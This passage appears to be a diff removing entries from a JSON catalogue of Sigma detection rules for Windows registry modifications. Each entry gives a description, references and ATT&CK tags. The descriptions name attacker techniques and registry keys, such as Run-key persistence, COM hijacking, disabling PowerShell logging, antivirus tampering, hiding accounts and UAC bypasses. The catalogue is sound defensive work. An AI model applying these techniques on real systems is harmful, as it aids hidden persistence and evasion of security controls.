OneDrive) may serve new COM objects at user-level" - ], - "filename": "registry_set_persistence_search_order.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/", - "https://attack.mitre.org/techniques/T1546/015/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ] - }, - "uuid": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", - "value": "Windows Registry Persistence COM Search Order Hijacking" - }, - { - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/22", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_persistence_typed_paths.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/dez_/status/1560101453150257154", - "https://forensafe.com/blogs/typedpaths.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "086ae989-9ca6-4fe7-895a-759c5544f247", - "value": "Persistence Via TypedPaths" - }, - { - "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/01", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_policies_associations_tamper.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", 
- "refs": [ - "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", - "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", - "value": "Modify Attachment Manager Settings - Associations" - }, - { - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/01", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_policies_attachments_tamper.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", - "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", - "value": "Modify Attachment Manager Settings - Attachments" - }, - { - "description": "Detects that a powershell code is written to the registry as a service.", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/06", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_powershell_as_service.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - 
"https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_as_service.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", - "value": "PowerShell as a Service in Registry" - }, - { - "description": "Adds a RUN key that contains a powershell keyword", - "meta": { - "author": "frack113, Florian Roth", - "creation_date": "2022/03/17", - "falsepositive": [ - "Legitimate admin or third party scripts" - ], - "filename": "registry_set_powershell_in_run_keys.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry", - "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "8d85cf08-bf97-4260-ba49-986a2a65129c", - "value": "Powershell in Windows Run Keys" - }, - { - "description": "Detects the modification of the registry of the currently logged in user to disable PowerShell module logging, script block logging or transcription and script execution logging", - "meta": { - "author": "frack113", - "creation_date": "2022/04/02", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_powershell_logging_disabled.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ] - }, - "uuid": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "value": "PowerShell Logging Disabled" - }, - { - "description": "Detects when a new custom protocole handler is registered", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/05/30", - "falsepositive": [ - "Legitimate applications registering a new custom protocol handler" - ], - "filename": "registry_set_register_custom_protocol_handler.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_register_custom_protocol_handler.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", - "value": "Newly Registered Protocol Handler" - }, - { - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/24", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ] - }, - "uuid": "8023f872-3f1d-4301-a384-801889917ab4", - "value": "Usage of Renamed Sysinternals Tools - RegistrySet" - }, - { - "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key 
to get the location of the script to execute", - "meta": { - "author": "frack113", - "creation_date": "2022/08/20", - "falsepositive": [ - "Legitimate use of the dll." - ], - "filename": "registry_set_scrobj_dll_persistence.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scrobj_dll_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ] - }, - "uuid": "fe20dda1-6f37-4379-bbe0-a98d400cae90", - "value": "Scrobj.dll COM Hijacking" - }, - { - "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", - "meta": { - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", - "creation_date": "2022/05/04", - "falsepositive": [ - "Legitimate use of screen saver" - ], - "filename": "registry_set_scr_file_executed_by_rundll32.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/VakninHai/status/1517027824984547329", - "https://twitter.com/pabraeken/status/998627081360695297", - "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "uuid": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", - "value": "ScreenSaver Registry Key Set" - }, - { - "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. 
This is often used as a method of persistence.", - "meta": { - "author": "frack113", - "creation_date": "2022/02/04", - "falsepositive": [ - "Administrative scripts", - "Installation of a service" - ], - "filename": "registry_set_servicedll_hijack.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time", - "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ] - }, - "uuid": "612e47e9-8a59-43a6-b404-f48683f45bd6", - "value": "ServiceDll Hijack" - }, - { - "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", - "meta": { - "author": "frack113", - "creation_date": "2022/03/18", - "falsepositive": [ - "Legitimate admin script" - ], - "filename": "registry_set_set_nopolicies_user.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "1c3121ed-041b-4d97-a075-07f54f20fb4a", - "value": "Registry Explorer Policy Modification" - }, - { - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility 
Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/30", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_shim_databases_persistence.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb", - "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_shim_databases_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.011" - ] - }, - "uuid": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", - "value": "Registry Key Creation or Modification for Shim DataBase" - }, - { - "description": "Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/02/26", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_silentprocessexit.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", - "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_silentprocessexit.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.012" - ] - }, - "uuid": "c81fe886-cac0-4913-a511-2822d72ff505", - "value": "SilentProcessExit Monitor Registration" - }, - { - 
"description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Legitimate SIP being registered by the OS or different software." - ], - "filename": "registry_set_sip_persistence.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/codesigning.html", - "https://github.com/gtworek/PSBits/tree/master/SIP", - "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1553.003" - ] - }, - "uuid": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", - "value": "Persistence Via New SIP Provider" - }, - { - "description": "Detects tamper attempts to sophos av functionality via registry key modification", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/02", - "falsepositive": [ - "Some FP may occure when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" - ], - "filename": "registry_set_sophos_av_tamaper.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sophos_av_tamaper.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "value": "Tamper With Sophos AV Registry Keys" - }, - { - "description": "Detects when an attacker set the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" 
to \"0\" in order to hide user account.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/12", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_special_accounts.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_special_accounts.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.002" - ] - }, - "uuid": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", - "value": "Hide User Account Via Special Accounts Reg Key" - }, - { - "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", - "meta": { - "author": "frack113", - "creation_date": "2022/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_suppress_defender_notifications.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", - "value": "Activate Suppression of Windows Security Center Notifications" - }, - { - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/10", - "falsepositive": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" - ], - "filename": "registry_set_susp_app_paths_persistence.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", - "https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.012" - ] - }, - "uuid": "707e097c-e20f-4f67-8807-1f72ff4500d6", - "value": "Suspicious Values In App Paths Default Property" - }, - { - "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. 
Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/10/12", - "falsepositive": [ - "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" - ], - "filename": "registry_set_susp_keyboard_layout_load.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index", - "https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ] - }, - "uuid": "34aa0252-6039-40ff-951f-939fd6ce47d8", - "value": "Suspicious Keyboard Layout Load" - }, - { - "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/01", - "falsepositive": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" - ], - "filename": "registry_set_susp_printer_driver.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1410545674773467140", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" - ] - }, - "uuid": "e0813366-0407-449a-9869-a2db1119dc41", - "value": "Suspicious Printer Driver Empty Manufacturer" - }, - { - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "meta": { - "author": 
"Florian Roth, oscd.community", - "creation_date": "2018/07/18", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_susp_reg_persist_explorer_run.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "b7916c2a-fa2f-4795-9477-32b731f70f11", - "value": "Registry Persistence via Explorer Run Key" - }, - { - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", - "meta": { - "author": "Florian Roth, Markus Neis, Sander Wiebing", - "creation_date": "2018/08/25", - "falsepositive": [ - "Software using weird folders for updates" - ], - "filename": "registry_set_susp_run_key_img_folder.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "value": "New RUN Key Pointing to Suspicious Folder" - }, - { - "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", - "meta": { - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", - "creation_date": "2019/04/08", - "falsepositive": [ - "Other legimate 
tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." - ], - "filename": "registry_set_susp_service_installed.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_service_installed.yml" - ], - "tags": [ - "attack.t1562.001", - "attack.defense_evasion" - ] - }, - "uuid": "f2485272-a156-4773-82d7-1d178bc4905b", - "value": "Suspicious Service Installed" - }, - { - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", - "meta": { - "author": "frack113", - "creation_date": "2022/10/01", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_susp_user_shell_folders.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.001" - ] - }, - "uuid": "9c226817-8dc9-46c2-a58d-66655aafd7dc", - "value": "Modify User Shell Folders Startup Value" - }, - { - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - "meta": { - "author": "Syed Hasan (@syedhasan009)", - "creation_date": "2021/06/18", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_taskcache_entry.yml", - "level": "high", - "logsource.category": 
"registry_set", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://labs.f-secure.com/blog/scheduled-task-tampering/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" - ] - }, - "uuid": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", - "value": "Scheduled TaskCache Change by Uncommon Program" - }, - { - "description": "Detects persistence method using windows telemetry", - "meta": { - "author": "Lednyov Alexey, oscd.community", - "creation_date": "2020/10/16", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_telemetry_persistence.yml", - "level": "critical", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.005" - ] - }, - "uuid": "73a883d0-0348-4be4-a8d8-51031c2564f8", - "value": "Registry Persistence Mechanism via Windows Telemetry" - }, - { - "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "meta": { - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", - "creation_date": "2022/09/29", - "falsepositive": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" - ], - "filename": "registry_set_terminal_server_suspicious.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - 
"https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", - "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", - "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", - "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", - "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112" - ] - }, - "uuid": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", - "value": "RDP Sensitive Settings Changed to Zero" - }, - { - "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "meta": { - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", - "creation_date": "2022/08/06", - "falsepositive": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" - ], - "filename": "registry_set_terminal_server_tampering.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", - "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", - "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", - 
"https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", - "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112" - ] - }, - "uuid": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", - "value": "RDP Sensitive Settings Changed" - }, - { - "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/06/19", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_timeproviders_dllname.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" - ] - }, - "uuid": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", - "value": "Set TimeProviders DllName" - }, - { - "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", - "meta": { - "author": "frack113", - "creation_date": "2022/08/28", - "falsepositive": [ - 
"Legitimate use" - ], - "filename": "registry_set_treatas_persistence.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", - "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ] - }, - "uuid": "dc5c24af-6995-49b2-86eb-a9ff62199e82", - "value": "COM Hijacking via TreatAs" - }, - { - "description": "Detects UAC bypass method using Windows event viewer", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/19", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_uac_bypass_eventvwr.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", - "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" - ] - }, - "uuid": "7c81fec3-1c1d-43b0-996a-46753041b1b6", - "value": "UAC Bypass via Event Viewer - Registry Set" - }, - { - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. 
UACMe 53)",
- "meta": {
- "author": "Omer Yampel, Christian Burkard",
- "creation_date": "2017/03/17",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_uac_bypass_sdclt.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/",
- "https://github.com/hfiref0x/UACME",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1548.002",
- "car.2019-04-001"
- ]
- },
- "uuid": "5b872a46-3b90-45c1-8419-f675db8053aa",
- "value": "UAC Bypass via Sdclt"
- },
- {
- "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)",
- "meta": {
- "author": "Christian Burkard",
